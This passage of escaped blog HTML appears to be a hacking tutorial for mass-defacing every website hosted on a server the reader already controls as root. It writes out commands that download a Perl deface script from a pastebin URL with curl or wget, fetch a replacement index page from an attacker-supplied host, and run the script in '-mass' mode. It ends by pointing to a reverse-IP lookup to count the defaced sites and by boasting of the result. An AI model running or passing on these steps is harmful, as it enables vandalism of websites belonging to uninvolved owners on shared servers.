/&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;root@serverattack/var/www/home:# cd /root&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;so it goes into dir root server :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;background-color: initial; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;root@serverattack:# dir root &amp;lt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;now for the next step if you are already in root dir, you typed command to call our mass deface file by typing command :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;curl -o root.pl http://pastebin.com/raw/A12b82ar&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;or&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;wget http://pastebin.com/raw/A12b82ar -o root.pl&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if  it appears 200 OK status means the file has been uploaded in the target  server, the next step we go to dir tmp by typing the command :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;background-color: initial; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;root@serverattack:# cd /tmp&lt;/b&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;so it goes into dir tmp server :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;background-color: initial; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;root@serverattack/tmp:# dir tmp &amp;lt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if it&#39;s next we can upload the file again that is for now we will upload our deface page file with the command :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;curl -o index.html&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;http[s]://yourdefacepage.com/&lt;/b&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;&amp;nbsp;or&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;wget&amp;nbsp;&lt;/b&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;http[s]://yourdefacepage.com/&lt;/b&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;&amp;nbsp;-o index.html&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if  the file is already uploaded our last step is to execute our mass  deface file, we must go to root dir again to execute ,&amp;nbsp;if it&#39;s going to  root dir, we type the command :&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;b&gt;perl root.pl -mass /tmp/index.html&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and  wait until the execution process is complete, if it is finished you can  see if the web is hit by deface and check how many web that is in 1  server, you can use tools &lt;a href=&quot;https://www.yougetsignal.com/tools/web-sites-on-web-server/&quot;&gt;reverse ip&lt;/a&gt;.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and see all the web that resides on one server that, yups web in 1 server it Pwnd. :p&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;PoC Video :&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/BM-JcR42qgI/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; 